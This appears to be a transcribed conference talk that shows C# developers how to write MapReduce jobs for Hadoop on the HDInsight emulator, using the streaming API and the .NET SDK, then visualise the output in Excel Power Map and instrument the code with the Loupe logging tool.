here, open Visual Studio, and have a quick look at the problem here. So for some reason, totally unknown to me, the canonical example for Hadoop is the word count. A bit like the canonical example for any programming language that you'll ever come to learn is Hello World. The canonical example for Hadoop is Hello, is the word count. And we all know if you don't start with the canonical examples, then the demo gods will smite you and the rest of your presentation will fall apart. So we're going to do the same, we're going to start with the canonical example. So what I've got here is a very naive word count algorithm that you might run on your local machine. So the first slide here, what I've got is a simulation of an input. It's just a string of numbers, and you can see there, sorry, a string of words, and you can see there that I've got one, one, two, two, three, three, and four, four, so you can see what I did there. 
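For reference, a rough sketch of the naive word count being described might look like the following. This is a sketch only; the exact input string and the variable names are assumptions rather than the speaker's actual demo code:

```csharp
using System;
using System.Linq;

class NaiveWordCount
{
    static void Main()
    {
        // Simulated input: "one" appears once, "two" twice, and so on.
        var input = "one, two, two, three, three, three, four, four, four, four";

        // Split on the comma, trim the extra spaces, then group the words.
        var groups = input
            .Split(',')
            .Select(w => w.Trim())
            .GroupBy(w => w);

        // Write out each word and how many times it appears.
        foreach (var group in groups)
            Console.WriteLine("{0}: {1}", group.Key, group.Count());
    }
}
```

The walkthrough that follows goes through exactly these steps: split on the comma, group, trim and count.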
All right, so it'll make it easier to see if the word count is working properly. And then what I do is I split that up on the comma, I then use the group by statement to group those words together. Then I iterate over the grouping of words, and what I do is I write out the word, having trimmed off the extra spaces at the start and at the end, and also I then count the number of times it appears, the number of times it's in the group. All right, so that's a very naive word count problem, algorithm, sorry, we can run that, see that it works. Okay, and you can see that that works. One appears one time, two appears two times. Okay, so the issue with that is that it is both memory and CPU bound. Okay, it's memory bound obviously, because what we're doing there is we're reading the entire input into memory, and then we're iterating over it. And you can say, well, okay, that's fine. You know, as the input grows, then we'll stop actually reading it all into memory at one time, and we'll just read it line at time. And that's when it becomes CPU bound, because it becomes a point where the input is so big that even reading it one line at a time, the CPU doesn't operate fast enough for you to get the answer in any kind of reasonable time. All right, and now people say to me, ah, yes, but Gary, you know, you can use the TPL library and you can run several of them at a time. And I can say yes, but what happens if your input doubles? Oh, well, Gary, don't worry about that, you know, because now I saw a really cool talk earlier on this week about offloading CPU work on to the GPU so I can do that too. I said, yes, you can, but what happens if I double that input? And I can keep, like a child, just keep saying that until you want it, and eventually you'll realize that you will exhaust the resources of a single machine no matter how big that machine is. Okay, so that's the actual problem. So what we have to do is we have to get around that problem. And what do developers do? What's the first kind of tool in our toolbox when we want to overcome these problems? We reach for straight away, and that tool is divide and conquer. We don't only do that as developers, we actually do that as children. And we actually do that as adults. It's a natural human reaction, divide and conquer. Getting many things done at once or doing something else while something else is doing a good example of that is your commute to work. Hands up here if you commute to work. Okay, keep your hands up if you've got a best time for that commute to work. And the hands up if you are secretly pleased every time you beat that best time. Okay, so it's something that we do naturally. We do that divide and conquer. I can be in the morning, I can get the kettle on and while that's boiling I'll make my toast and then we can get out the door and that'll give me an extra 15 minutes in bed. Dividing conquer is the thing we naturally reach for. And it's the same for this problem. And so our equivalent in the Hadoop world of divide and conquer is map and reduce. Alright, so if I quickly just switch over to this solution now and open up this problem, what I've got is the exact same problem, but then split over a map and reduce function. So what I've got here is you can see the exact same input here, it gets passed to a mapper, and then the output of that mapper gets passed to the reducer. Okay, so what does a mapper do? What a mapper does is it takes any given input and for any given input it outputs a key value pair. 
Okay, and the key in the value can be strings, but it can be in the value, it can be anything that can be expressed as a string. So if you've got an object graph and you can see the line that down to a string, you can attach that to the value. So it doesn't have to be one value. And for this particular case, what our algorithm is doing is it's for every word that it sees, it's outputting the word and the integer one. So basically what the mapper is doing is it's saying, I've seen that word once, I've seen that word once, I've seen that word once. Okay, now if you have a look at the actual algorithm in there, it looks pretty similar to the actual naive algorithm they had. So we haven't actually had to change our algorithm that much other than to do the output. Okay, so it looks pretty much the same. Moving down here to the reducer, and what the reducer does is it takes the output from the mapper and for every key which is the same. So for all the matching keys, all the matching keys come to the reducer and the reducer then reduces down all of those mapped outputs with the same key to a single value. Okay, so in our case, what it's going to do is it's going to take for every word that appears, it's going to appear a number of times and all the reducer is going to do is to count up the number of times that appears. And it's also going to output a key value pair and this time the key will be the word itself and the value will be the reduction or in this particular case the summation of all those ones to do our word count. Okay, so first thing we're going to do is just prove that that works. So if I click on here and I make that the start up and quickly launch that, we should see it's exactly the same output. All right, so we know we've got our algorithm working properly. And what we've done here is we've now split it, we've done a divide and conquer, we split it into a map and reduce function. And those map and reduce functions can be spread out over as many nodes in a cluster as we want. Okay, so now when ChildishGarry comes along and says, ah, yes, but what happens when the input doubles? I just say, well, I double the number of nodes in my cluster. But what happens if I double the input? Well, I double the number of nodes in my cluster and then we can we can keep going like that until one of us gets tired. So what we've done here is gotten rid of that problem of large input and not been able to deal with it on a single machine. Okay, and that is the problem area that we're working in. It's the problem that map reduce fixes. Okay. So let's jump back to our slides now. Okay, so that's what map reduce does. But actually, much like a man who's, if you're a software developer, okay, and you have a problem, and you decide to solve that problem with regular expressions, you now have two problems. Okay, you're an original one. And the fact that you're trying to use regular expressions to solve your problem. It's the same here with using map reduce. All we've actually done is swap one problem for a whole new set of problems. So the initial problem we had was that the size of our input was was too much for a single machine to deal with. And we solved that problem by using map and reduce and pushing the map and reduce functions out onto nodes in a cluster. But that gives us a whole new set of problems to deal with. Okay, so for example, you will have to it's your responsibility to split up that input into those different parts and to push those out. You also have to deal with hard disk failures. 
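Before digging into those failure modes, here is a rough sketch of the map and reduce split just described, simulated on a single machine. The type and method names are assumptions, not the speaker's actual demo code:

```csharp
using System;
using System.Collections.Generic;
using System.Linq;

class MapReduceWordCount
{
    // Map: for every word seen, emit the key-value pair (word, 1).
    static IEnumerable<KeyValuePair<string, int>> Map(string line) =>
        line.Split(',').Select(w => new KeyValuePair<string, int>(w.Trim(), 1));

    // Reduce: for one key, sum up all of the 1s emitted by the mappers.
    static KeyValuePair<string, int> Reduce(string key, IEnumerable<int> values) =>
        new KeyValuePair<string, int>(key, values.Sum());

    static void Main()
    {
        var input = "one, two, two, three, three, three, four, four, four, four";

        // The grouping step plays the role of the shuffle: all mapped output
        // with the same key ends up in the same reduce call.
        var results = Map(input)
            .GroupBy(pair => pair.Key, pair => pair.Value)
            .Select(group => Reduce(group.Key, group));

        foreach (var result in results)
            Console.WriteLine("{0}: {1}", result.Key, result.Value);
    }
}
```

On a real cluster the Map and Reduce calls run on different nodes, which is exactly why the new problems discussed here appear.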
What happens if you've got 10 nodes in your compute cluster, you break your input up into 10 parts and push those out, you start to run your map function, and one of the hard drives fails on one of the machines? You're now only going to get nine tenths of the input. So you have to deal with that. So you've got a whole load of new problems to deal with. So whilst MapReduce solves the problem of dealing with large input, what we really need is a framework which will take all of that heavy lifting off our shoulders, all those other problems that using MapReduce brings. And that's what Hadoop does. Hadoop will lift all of those issues off our shoulders for us. So, this is a little bit awkward actually, because normally at this point I point to the screen, only I don't have the screen here, it's at the sides, but this is a diagram of how Hadoop actually works. The part on the left-hand side will take any kind of input. The input comes in and goes into the name node at the top. What the name node does, by default, is split your input file, whatever size it is, into 64-megabyte chunks. Each of those 64-megabyte chunks is saved once and replicated twice. The first time it's replicated, it's replicated on a node in the same rack as the one it was stored on. That gives us node redundancy: while we're running our map function, if we get a hard drive failure in the node that's running it, we've got another node in that rack that's got the same data and can run the same work. So that protects us against losing nodes. The second time it's replicated, it's replicated on a node in a separate rack. So now we've got rack redundancy: when our MapReduce job is running on Hadoop, we can lose an entire rack of nodes from our cluster and our work will still get completed. So that's how it deals with that problem for us. On the right-hand side is where our map and reduce functions come in. We put a map function in there and it gets sent out to the nodes in the cluster as well. So now, when we actually come to do work, we've got a 64-megabyte chunk of the file and the function that's going to run against it right next to each other on the same node, so it's very fast. That also allows us to use commodity machines in our compute clusters, because you don't need a very powerful machine to operate on a 64-megabyte chunk of a file. What happens between the map and the reduce is what's called the Hadoop shuffle. Here we see, on the top, nodes 1 to 3 doing all the mapping and producing output. In terms of a word count, node 1 will be turning out the word "the" and the word "and" and the word "when", and so will node 2, and so will node 3. And what happens during the Hadoop shuffle is that all of the output for the word "the", for example, goes to the first node on the bottom, all of the output for the word "when" goes to the second node on the bottom, and all the other words go to the third node. So every piece of output with the same key goes to the same node. So the reducer is only working on output from the mappers with the same key.
Which gives us as clue as to what's the fastest way to break an Hadoop cluster. Given that information, do you know what's the fastest way to, can you see what's the fastest way to break a Hadoop cluster? They all have the same key, exactly a universal key. So what happens there is if you've got a thousand nodes in your cluster and you've got a universal key, all of the work will go to one node and it will sit there working its little heart out and the other 999 will be sitting there going well we have got no work to do. So watch out for that kind of thing. When you're actually grouping on something in code make sure it actually as evenly as possible partitions the data that you're working with. Okay. Okay so now that we understand the problem that we're dealing with and the fact that MapReduce solves that problem and then the fact that Hadoop will lift all the problems that MapReduce brings with us off of our shoulders, how do we actually install it? Well the easiest way to install Hadoop on your machine, on your Windows development machine is to use the HD Insight Emulator and you will find the HD Insight Emulator in the web platform installer. So if you launch the web platform installer and then just search for HD Insight you will find this one hit here. If you do not find this hit when you're searching for it in the web platform installer it's probably because you are running a 32-bit version of your operating system. Okay you have to be running the 64-bit version of an operating system to install HD Insight Emulator. Now if you're not you won't get any kind of warning or any kind of error or something like that right you'll just search for it and it won't appear there and you will have no idea why as far as you're concerned it just won't be there. I'm not entirely sure why they do that and not give you any kind of clue but if you're seeing that symptom if you're searching for it and you're not seeing that then it's because you're running a 32-bit. Okay once you've found it you just hit on the add and hit the install button, click on the licenses it'll tell you here the prerequisites it will also add in anything that you require that you don't have on your machine in order for you to do that that will automatically be added in for you and then it'll install nicely and when it's finished it'll tell you what it's installed. If you've got the.NET framework and everything like that already installed then the only thing that it'll probably install here is the Hortonworks data platform for Windows that is basically Hadoop and the Microsoft HD Insight Emulator for Windows Azure. It'll also add three icons to your desktop one will be the Hadoop command line we'll have a look at that later the other one will be a page which will take you to the Hadoop name node and one which will take you to the jobs page which will let you view running jobs. It'll also install a whole load of services into your machine here and it will start them all so if you just have a look to make sure if you don't have HD Insight running and installed properly once you've got it installed the best thing to do is have a look at your local services and see if any of them or make sure all of them are running. Okay so how do you get your C-Sharp code running on HD Insight on Hadoop once you've got that installed on your machine. Alright so we've had enough of word count now we did not invent powerful computers and we did not invent Hadoop clusters so that we can count words okay that is already a solved problem. 
So what we're going to do is kind of change it up a bit and we'll have a look at a different kind of example. One we're going to pick is horse racing prediction right we're going to simulate prediction horse racing right and one of the ways that you can do it is that you can pick a whole load of attributes about the horse and the jockey together 20 or so or 200 or whatever kind of statistics you want and then you can reduce that down into one index okay so you can say well this what's this jockeys career win rate what's this jockey season win rate what's the horses season win rate what's the jockeys win rate on that horse what's the horses win rate at that ground what's the jockeys win rate at the ground all these kind of things and then we can reduce that down into one index and then see which index has got the highest value is the horse most likely to win right so that's what we're going to simulate. So let's do that now let's switch back here and have a look at the streaming. So what we're going to do and actually what I'll do first of all is give you a look what I've got is a bunch of data here so if I just open this up what we're going to look as you can see I've got absolutely no imagination whatsoever for horses and jockeys and course names I've just named them sorry I've just numbered them so what we've got is we're going to take an input that just says it gives you a horse and a jockey in the ground the race track that it's running at okay and that's what we're going to take into Hadoop and what we're going to end up with at the end is a bunch of horses names and their index their likelihood of winning okay so how are we going to achieve that. The first thing I'm going to show you how to get it running is the easiest way to get it running as far as you being a C-sharp or a.NET developer okay and getting your code running on Hadoop so it's a little bit awkward to get it running this way but it means that you have very little code to write outside of what you would write normally in fact none of the code that I'm going to show you is Hadoop specific okay at this stage so what we're going to use is an API that Hadoop provides called streaming so we're going to use the streaming API and to do that what we need is we need a solution and in our solution we need two console applications okay I've called one mapper and one reducer just so we can see which is which but that's not a naming convention you have to stick to you can call them whatever you like it's just going to be much easier for us to see what's doing what if I call them mapper and reducer so if we open our mapper first what we're going to do is you can see how this works is we just consume the command line okay so when we're using the streaming API what will happen is we will give Hadoop we'll point Hadoop at a file and we'll point Hadoop at map and reduce functions that we write and Hadoop will feed us one line from that file at a time or actually what it will do is once we're out on the nodes it will feed one line from the 64 megabyte chunk of that file that we've got to our mapper and we just consume it from the command line so as we can see here what we do first of all is we take that string that I showed you earlier in that file and we split it up on the on commas because it's a comma separated file we split it up into fields where we've got horse jockey and course and then what we do go away and then what we do is we create our list of stats that we want okay so we go down here now at the at the moment what I've got 
here is I just create a new random double, and that's simulating the kind of work we would do to find our stats. So if the stat was "what is the career win rate for this particular horse", you'd go out and find that information from a database or a file or whatever. Now, when I say you go out and find that from a database, it's important that you do that work ahead of time and then get it into a file that you can push out onto the nodes as well. The last thing you want to do is have Hadoop do all that hard work of splitting up the file and making everything really optimized, with a 64-megabyte chunk of a file and the function that's going to run against it sitting together, and then call out from that node across the network to do some database lookup or something like that. So do all that pre-calculation ahead of time and get it into files on that machine, files you can actually open from that machine. That's the important thing. But here we're just going to simulate that by returning some random double, which would be, you know, this horse has won three out of its last eight races; that returns a double. And then we just append that to the stats we've got already, comma separated. So if we had 20 or 200 or however many statistics, we just have the first statistic, then the next, all comma separated in one string. And then, once we get that string back, we write it out, tab separated, not onto the command line, sorry, onto the console. So you can see we're just reading from and writing to the console; that's all we have to do. None of that code will be alien to a C# programmer, it's all very simple, and none of it contains anything that is Hadoop specific. Down in the reducer it's exactly the same thing. Hadoop is going to feed your reducer algorithm one line of that output at a time, and again we're going to split that line up into fields, this time on tab, because that's how the mapper output its tab-separated key-value pair, and we separate our key and our value. Here the key is going to be the horse's name, and the value is going to be that large string of doubles that we got from our statistics. What we want to do is reduce that down into one index, basically by iterating over the statistics, converting each of them into an actual double, because they're strings at the minute, remember, and summing them together. Then at the end we output the key, which is the horse's name, and the index. So we've reduced that down into one index. Now what we're going to do is build that, and while I'm doing that I'm going to show you something: open this up, not that, this one. There are two things about the build that we want to pay attention to here. Notice the platform target is 64-bit. You must compile for a 64-bit architecture to run on HDInsight. Luckily, this time you will actually get an error if you get it wrong: if you compile it as 32-bit and push it up onto your local HDInsight emulator, it will come back and say, no, this is a 32-bit application, I can't run this.
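As a rough sketch of the streaming mapper and reducer just described, reading lines from standard input and writing tab-separated key-value pairs to standard output, something like the following would do. The field layout and the names are assumptions based on the description above, not the speaker's actual demo code; in the real setup the two methods would live in two separate console executables:

```csharp
using System;
using System.Linq;

static class HorseStreaming
{
    // Mapper: reads "horse,jockey,course" lines and emits "horse<TAB>stat1,stat2,...".
    static void RunMapper()
    {
        var random = new Random();
        string line;
        while ((line = Console.ReadLine()) != null)
        {
            var fields = line.Split(',');
            var horse = fields[0].Trim();

            // Simulate looking up 20 pre-calculated statistics.
            var stats = string.Join(",",
                Enumerable.Range(0, 20).Select(_ => random.NextDouble()));

            Console.WriteLine("{0}\t{1}", horse, stats);
        }
    }

    // Reducer: reads "horse<TAB>stats" lines and sums the stats into one index.
    static void RunReducer()
    {
        string line;
        while ((line = Console.ReadLine()) != null)
        {
            var parts = line.Split('\t');
            var horse = parts[0];
            var index = parts[1].Split(',').Sum(double.Parse);

            Console.WriteLine("{0}\t{1}", horse, index);
        }
    }

    static void Main(string[] args)
    {
        // One executable per role in practice; a flag keeps this sketch compact.
        if (args.Length > 0 && args[0] == "reduce") RunReducer();
        else RunMapper();
    }
}
```

Because nothing here is Hadoop specific, it can be tested locally exactly the way the talk describes next, by piping a sample file through the mapper and then the reducer.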
So that's the first thing. The second thing I'm going to show you is that I've got a build event here which copies the executable out to a separate directory, and I'm going to show you why. One of the benefits of not having done anything in there which is Hadoop specific is that we can actually test our work on our local machine before we push it up into our Hadoop cluster. There is a set of tools called the GNU command line tools for Windows, and if you install that, it gives you some of the Linux command line tools that we're going to use. Now, having that, as you can see, what I did was copy things out here, so I've now got the CSV file I want plus my mapper and my reducer, copied out into this test directory. If I open up the test directory, what I can do is say, well, I want to cat, not that, I want to cat the horse file. Really, why is that not working? Ah, why am I not in the test directory? Okay, now I am, right, thank you for that. What we do now is cat the horse file, pipe the output of that into our mapper, and then pipe the output from our mapper into our reducer, like so, and we can now actually test that. And so that works. So, because we're not using any Hadoop-specific code, we have the ability to test our map and reduce functionality on our local machine before we push it up to the cloud or wherever it is we're going. Obviously, if you've got a large file, a terabyte or a petabyte file, you're not going to pipe the whole thing in there, that's not going to work, but you can use the command tools to take the head, the first 100 lines or whatever, so you can actually test it here. So now that we've tested our algorithm, we need to get it up onto our Hadoop cluster. How we're going to do that is pop over here and open the Hadoop command line, like so, and this gives us access to the Hadoop command line. So what we want to do now is actually get this running on Hadoop. We'll say: Hadoop, I want to use your file system and I want to make a directory, and we'll call that demo-in, and Hadoop will create that for us. Then we'll say: hey Hadoop, I want to use your file system and I want to put a local file, I want to put this horses file here up into demo-in, and that's going to put that file up onto our cluster for us. Now we need to put our mapper and reducer up there, so we'll create another directory; this time we'll call it apps, that's where we're going to keep our apps. And we'll say: I want to use your file system and I want to put a local file; we'll grab our mapper and put it into demo-apps, like so, and then we'll do the same thing here, fs put, and we'll grab the reducer this time and stick that into demo-apps as well. Now, once we've got everything up onto Hadoop, we actually need to launch the job, and as I said before, we're using the streaming API, and in Hadoop the streaming API is actually wrapped up in a jar file. So what we actually need to do now is run a jar. So we say: hey Hadoop, I want to run a jar file, and this jar lives
in lib and it's called hadoop dash streaming dot jar okay now in rehearsals and when I'm giving this talk I only this is a complicated command line to get our job working and I only actually get it right about three times at five so let's see if I can let's see if today is a good day so first thing we want to do is we want to say I want to create a job right and I need to I need to show you some files because I've got a mapper reducer files so we use the dash files command and then what we do is we say hey the file that I want you to use lives on the HDFS file system and it lives in demo dash apps and it's called mapper dot xy I've also got another one it lives on the HDFS file store and it lives at demo dot no it doesn't dash apps and it's called reducer dot xy and that's going to tell hadoop to it needs to actually push out these files onto each of the nodes in the cluster the next thing we want to tell it is we need to tell it the name of the executable that will actually do the mapping okay so we say our mapper is called mapper dot xy and the same thing for a reducer we have to tell it that our reducer is called reducer dot xy once we've done that we have to say oh by the way the input that I want you to use is in demo dash in slash in and I want you to put the output results to demo dot out okay so let's say if I've managed to get this command line right keep your fingers crossed looks like it's going to start okay so I haven't hooked up to any of the feedback from hadoop so what the mapper is going to say at the minute is it's going to go from I've done none of the work to I've done all of the work okay just in a second so there's the maps finished 100% the reducer will now kick off it's going to be the same you're not going to get any feedback it'll sit there for saying I've done absolutely nothing and then it'll say I've done all the work when it's finished and then hadoop will tell us where it's put the output so if we just quickly have a look at that we can say hey hadoop I want to use your file system please tell me what you've got in demo out and the bit we're interested in there is the bit at the bottom that's that part dash with them five zeros that's actually got our output in it so we can say to hadoop again I want to use a file system this time I want to cat and demo dash out dot part okay and we're going then to see the output and we can see that's the same as the output that we saw when we were running it locally so we know our code is running perfectly well up on the cluster now that is the easiest way for you as C sharp developers to get code up onto hadoop all right you haven't actually had to write any code there which is anything to do with hadoop right that was just pure C sharp code but having to do all that command line work as a real faff right who enjoys working on the command line just one person two people all right so that's probably the way to go for you all right those of us who like I say I get that command wrong about two times out of five okay only get it right three times today was a good day excellent so what we want to know is is there is there another way of doing it and there is if we jump back here there is actually a map reduce SDK okay you can actually get it in from new get if you actually new get this thing here and Microsoft dot dot hadoop dot map reduce it will bring in a whole load of other dependencies now what that will allow you to do is kind of bypass all that nasty command line stuff but it does mean that you have to start working with 
some Hadoop-specific code now, but it isn't too terrible, to be honest. When you're using the SDK you have to do three things. The first is that you define a mapper class, and the mapper class inherits from MapperBase up here; you override a method called Map, and that Map gets an input line, just the same as consuming the console, but this time you also get a context. So instead of writing out to the console window at the end, what you do is write out to this context. Apart from that, you can see this algorithm here is exactly the same as the code you wrote in your vanilla C#; the only difference down here is that instead of writing out to the console, you're emitting onto this context. The next thing you need is a reducer, and in much the same way the reducer inherits from a reducer combiner base and does pretty much the same thing: you get the key, just the same as before, and you get a whole bunch of values, except instead of coming in as a single string they come in as an IEnumerable of string, which allows you to iterate over them. And again you get a context. But again, you see this algorithm here is exactly the same as it was before, so you don't have to do too much. Having created your mapper and your reducer, the last thing you have to do is create the job. To create the job with this SDK, we create a new Hadoop configuration. You can set an awful lot of other things on it, but the two things you require as a minimum are the input path and the output folder; you can see these switches are just setting the things we set on the command line. Having done that, we connect to our Hadoop cluster. If you're just using the one on your local machine, you can just do connect and use the default constructor; if you're running this against a live cluster out on the cloud, you'll have a connection string, a user ID and a password, and you just use the constructor in which you pass those. That's the only difference between live and running it on your own machine; other than that, the code is exactly the same. And then you say: I want to run a MapReduce job, I want to execute it please with this mapper and this reducer which we've already defined, passing in the configuration that we set there. Now, that's not very difficult to do. Although we're now having to write Hadoop-specific stuff, it's quite straightforward: all we're really doing is inheriting from a particular class and overriding a method, things you'll have done a hundred times before, with a little bit of setup for the job. But what that enables us to do now is run it just by hitting F5 from Visual Studio. You can see there it's also detecting a whole bunch of dependencies. All of these dependencies have to go up onto Hadoop; in the command line version we had to use that -files switch and list all the files that needed to go up there, but the SDK is doing that for us now. So it's gone through, found all of the files which are a dependency, and it's pushing them up onto Hadoop for us.
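Pieced together from that description, the three pieces might look roughly like this. It is a sketch based on the Microsoft .NET SDK for Hadoop (the Microsoft.Hadoop.MapReduce NuGet package); the exact type and member names shown here, such as MapperBase, ReducerCombinerBase, HadoopJobConfiguration, Hadoop.Connect and EmitKeyValue, are my reconstruction of the API being described rather than something taken verbatim from the demo, so treat them as assumptions:

```csharp
using System;
using System.Collections.Generic;
using System.Linq;
using Microsoft.Hadoop.MapReduce;   // assumed NuGet package for the SDK

// 1. The mapper: same algorithm as the console version, but it emits to a context.
public class HorseIndexMapper : MapperBase
{
    public override void Map(string inputLine, MapperContext context)
    {
        var fields = inputLine.Split(',');
        var horse = fields[0].Trim();

        // Simulated statistics, comma separated (stand-in for real lookups).
        var random = new Random();
        var stats = string.Join(",",
            Enumerable.Range(0, 20).Select(_ => random.NextDouble()));

        context.EmitKeyValue(horse, stats);
    }
}

// 2. The reducer: the values for one key arrive as an IEnumerable<string>.
public class HorseIndexReducer : ReducerCombinerBase
{
    public override void Reduce(string key, IEnumerable<string> values,
                                ReducerCombinerContext context)
    {
        var index = values
            .SelectMany(v => v.Split(','))
            .Sum(double.Parse);

        context.EmitKeyValue(key, index.ToString());
    }
}

// 3. The job: set the input and output, connect, execute.
public static class Program
{
    public static void Main()
    {
        var config = new HadoopJobConfiguration
        {
            InputPath    = "/demo-in",     // hypothetical paths
            OutputFolder = "/demo-out"
        };

        // The parameterless Connect targets the local emulator; a live cluster
        // would take a cluster URI, user name and password instead.
        var hadoop = Hadoop.Connect();
        hadoop.MapReduceJob.Execute<HorseIndexMapper, HorseIndexReducer>(config);
    }
}
```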
Now it's running the mapper and reducer, and in the same way as before, I haven't hooked up any of the feedback, so we're going to get "none of the work done" followed by "all of the work done". So now that it's finished, it tells us where it's put the output, just the same as before. And you can see this command at the bottom; I left this command window open so you can see it. You can see Hadoop using the jar, and you can see all of the things that it put in; it's actually used the Hadoop streaming jar. So it's gone through the same mechanism as we had, but it's done all of the heavy lifting for us. You can see all of the files and everything that had to go up there. Without the SDK we would have had to do all of that ourselves, but now we get all that for free just by using the SDK. So those are the two ways of getting your code up there on Hadoop: you can either use the command line or you can use the SDK, whichever you prefer. Okay, let's pop back to our slides. Now that we've done that, how do I visualise my results? It's all very well doing all that kind of thing, but when I catted that file, the output was just a bunch of words and a bunch of numbers. As a data scientist or a big data engineer or somebody who wants to start writing code to run on Hadoop, if people have to be an engineer or a data scientist to understand the output, then for your business people you've already failed. You can't hand your boss a CSV file and say, hey look, horse six is the one. So one of the ways that we can visualise that, these days, is by using Excel. So what I'm going to do now is drop back down here, let's get a hold of this, if I open this, actually let's close that; what I've got now is a whole bunch of crime data. If you quickly have a look at this, we're going to pretend that this is now the output from MapReduce. I think we've seen how MapReduce works and we've seen how to write the code, so I don't want to go around the Hadoop loop again; we're just going to pretend that this output here is the output from a MapReduce job, and we want to see how we can visualise that from Hadoop. So I'm going to cheat slightly. I'm going to go across here to Hadoop and say: hey Hadoop, I want to use your file system, I want to make a directory, let's call it crimes-out. Say again? Okay, let's go back, go here, let's pop this open; maybe we weren't on the Hadoop command line. So: Hadoop file system, make directory, crimes-out. That's more like it. Alright, so if we grab this data file again, this time we'll just put it up here, so we'll say Hadoop fs, minus put, this file. Oh, really? Now you see, I even did the canonical example and still the demo gods have decided to smite me.
The demo has decided to crash, that's very nice. Let's close that down and open it back up again: documents, presentation, NDC data. Right, I have no idea what it was doing there, but we'll grab this crimes file, drop it there, thank you very much, I don't know why that was so difficult, and we'll put it in crimes-out. So that simulates the fact that we've actually run a MapReduce job and we've got our output in crimes-out. So now if we go up here and open up Excel, we can open that up, and we can use some of the tools that come in the Power BI package. Has everybody heard of Power BI? Anybody not heard of Power BI? Okay, so there are a few people. Power BI is a kind of analysis pack that's been released for Excel 2013 and for Office 365, and it allows you to do all kinds of clever stuff; I'm only going to demonstrate a couple of those things today. One of the things we can do is use Power Query. Power Query allows us to pull in data from, amongst other things, other sources, and when we pop open these other sources, one of the places we can now pull in data from is an HDFS file system, so that's basically Hadoop. So let's click on that, and Power Query says, well, hey, where is your Hadoop server? In our particular case we're just running it on localhost, so we type localhost and it says, fine, here is everything that I know about, which is very good. And what I'm just going to do is refresh this, because sometimes it doesn't pick up the most recent changes. Now I'll deselect all, because I want to look at crimes, and we hit that one, and there's one; hmm, I don't actually believe those are the most up-to-date versions, so there's one at the top. Which one shall we pick? Okay. So what we've done there is pull that information in from our HDFS file system. Now, of course, we don't have the first line being column headers, because, as you remember, all of the reducers are creating this output, and the reducer creates one line at a time. You could have a thousand reducers in your Hadoop cluster, and none of the reducers would know which one is responsible for putting the header in, so you don't get a header; it's up to you to remember what the column headers in your output are going to be. So now that we've pulled it into the query editor, what we can do is start to put in some column names. That is clearly a date, this is going to be a city, this is going to be the country, and now these are going to be a bunch of crimes, and we'll just make these up: we'll say this one is theft, this one is assault, and this one is some drugs offence. So Power Query allows us to create headings like that when we pull this in, and when we're finished with that we can hit apply and close, and what it's going to do then is pull that into Excel. Now, once we've got it into Excel, we can hit the insert button, and one of the other things that comes with Power BI is Power Map. So if we hit the map now and open this up, it takes a little while, and it's not going to work because I do not have an internet connection, unless I am still on the Wi-Fi. Yes, let's pretend I meant that and didn't suddenly have a panic there as I opened it up. What happens is Power Map uses Bing Maps, and so you have to have an internet
connection to get out to bring in the mapping information okay so what we do down here you can see the first thing it says is well what kind of geography are you trying to show now if it's clear to excel excel will work out so obviously we had a city and we had a country as well okay it's always good to include the country because we're using Bing maps and because it's it's Microsoft and because it's Bing maps it's very American centric so if you don't specify a country if you just specify a city for example and it can find that city in America all right it will choose the American one by default all right now I guess if you live in Norway that's not a huge problem okay if you live in the UK and we basically populated the US in the 1700s by kicking everybody they would didn't like out and send them across the Atlantic then that gives us a problem because they basically then went to America and renamed places in America from the places they came from so for me coming from coming from Scotland there are places called Dundee and Aberdeen in America and so if you do that if you can find a city in America it will choose that so always select a country as well but because I named these columns city and country power map knows that that is the geography if you've named it something different and from the naming convention power map can't actually work out which one it is it will allow you to select one it says look this is the actual geography and this is the kind of geography it is so I've named mine city and it says hey I think the column that you've named city is a city okay that works quite well so we hit the next button there it knows what we're doing and now we can actually start to view our data so let's have the assaults and the drugs and the thefts we can have all of those crimes here so let's get rid of that legend because we don't really care about that and let's make this map a little bit more interesting that's kind of better so that's one thing we can do straight away so now instead of just showing people a whole bunch of names and numbers and saying hey this is the output you can actually show them something like this which is kind of cool alright but what's even cooler is we can see here the column that we named date okay was actually if you remember from when I brought things in in power query was actually a date timestamp okay and so when power map actually sees that you've got a date timestamp and the date and times are contiguous it says hey do you know what I can make I can make a video of this for you okay if you take the date here and just drag that down into the time it says alright I will automatically make a video for you because these crimes happened at a time and without any effort whatsoever I can now click on this button and you can actually see the crimes happening and adding in real time from all of the cities okay now this is a much more powerful visualization than just saying hey here's a CSV file knock yourself out guys alright and the facilities in power BI allow us to do this kind of thing and an awful lot more it's a very powerful business intelligence visualization pack that's now available for excel the session isn't about power BI I'm just demonstrating these kind of things but as we are Microsoft developers and we're moving on to a dupe this is a kick starter for that you know this is a tool that you'll probably be using you know anyway excel is a tool you probably used anyway so it's now a great visualization tool for the work that we're doing in hadoop 
I'm not intending to speak about Power BI any further than that; as I said, the session is not about Power BI. So let's close that down and jump back to our slides. We've done visualization, so what about instrumenting our code? We might be used to instrumenting code so we can see how it's running in a live environment, and that's fine when it's on a single server, but how are we going to do that kind of thing when we're running on a cluster? There are lots of tools out there to do that. What I'm going to show you now is one from a company called Gibraltar Software, and they've got a product called Loupe. The reason I'm showing you this one is that everything I'm going to show you now with Loupe is totally free; you don't have to purchase anything to do what I'm about to demonstrate, and that's why I'm demoing with that particular product. So let me pull this back, and if we open this version here, this is some code which is instrumented. Once you've written your code, you can pull in the Gibraltar Agent NuGet package, bringing it and all of its dependencies into your project, and that allows you to start doing things like this at the start of Main: when the job starts, it says, I want to start logging now. The fact that we are on a cluster with, say, a thousand nodes isn't a huge problem, because Loupe is very well designed: if it needs to write any log entries at all, it writes them to a file on the local file system. Each of those nodes records its own file, so it's really quick. What you don't want is a product that calls out to a server across the network from your node as it's working, because that will totally kill performance; here it's just writing locally, so it's very efficient. We use that start session call to begin logging information for us, and then later on we start using calls like this to log information, for example exceptions. By exceptions I don't mean things that actually threw coding exceptions; I just mean exceptions in the input file, where you were expecting something and the format wasn't quite right. You can log those so you can find them later. And when we're finished, we call end session. Of course, you can also use Loupe to catch real exceptions: here I just throw one (three is the loneliest number), we catch it, and we use Loupe's record exception functionality to have that exception recorded for us. All of that is happening locally as the job is going on, just being written to the local file system, so it's nice and fast. At the end, when our job is finished, we call end session. When you're using it locally, everything I'm talking about just now is totally free. In production, what happens when you call end session is that each node, at the point where it has really finished its work, calls out to the server and pushes out that compressed, zipped-down log file. That's the only point at which you would actually have to pay Gibraltar Software any money: if you want to use their server to hold your information. Everything that I'm showing you now is completely free of charge.
